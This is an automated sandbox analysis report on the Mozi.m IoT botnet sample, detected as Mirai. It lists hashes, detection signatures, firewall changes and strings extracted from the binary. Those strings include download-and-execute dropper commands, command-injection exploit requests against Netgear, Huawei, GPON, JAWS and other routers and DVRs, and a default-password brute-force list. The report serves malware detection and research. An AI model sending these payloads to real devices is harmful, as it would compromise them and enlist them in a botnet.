Analysis Report Mozi.m

Overview

General Information

Sample Name: Mozi.m
Analysis ID: 294799
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Creates hidden files and/or directories
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "mkdir" command used to create folders
Executes the "mktemp" command used to create a temporary unique file name
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: Mozi.m Avira: detected
Antivirus detection for dropped file
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: Mozi.m Virustotal: Detection: 70% Perma Link
Source: Mozi.m ReversingLabs: Detection: 62%

Spreading:

barindex
Found strings indicative of a multi-platform dropper
Source: Mozi.m String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.m String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.m String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/Mozi.m (PID: 3515) Opens: /proc/net/route
Source: /tmp/Mozi.m (PID: 3515) Opens: /proc/net/route

Networking:

barindex
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 3690) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 4353) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4364) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4390) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4408) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4429) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4440) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 4467) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4478) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 3690) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 4353) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4364) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4390) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4408) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4429) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4440) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 4467) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4478) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
Sample listens on a socket
Source: /tmp/Mozi.m (PID: 3515) Socket: 0.0.0.0::51746
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: Mozi.m String found in binary or memory: http://%s:%d/bin.sh
Source: Mozi.m String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: Mozi.m String found in binary or memory: http://127.0.0.1
Source: Mozi.m String found in binary or memory: http://127.0.0.1sendcmd
Source: Mozi.m String found in binary or memory: http://HTTP/1.1
Source: Mozi.m String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.66.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: Mozi.m String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.66.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.66.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.66.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: Mozi.m String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Mozi.m String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Mozi.m String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.m String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

barindex
Writes HTML files containing JavaScript to disk
Source: /tmp/Mozi.m (PID: 3492) HTML file containing JavaScript created: /usr/networks Jump to dropped file

System Summary:

barindex
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: POST /cdn-cgi/
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample Potential command found: mount -o remount,rw /overlay /
Source: Initial sample Potential command found: mv -f %s %s
Source: Initial sample Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: killall -9 %s
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: POST /%s HTTP/1.1
Source: Initial sample Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
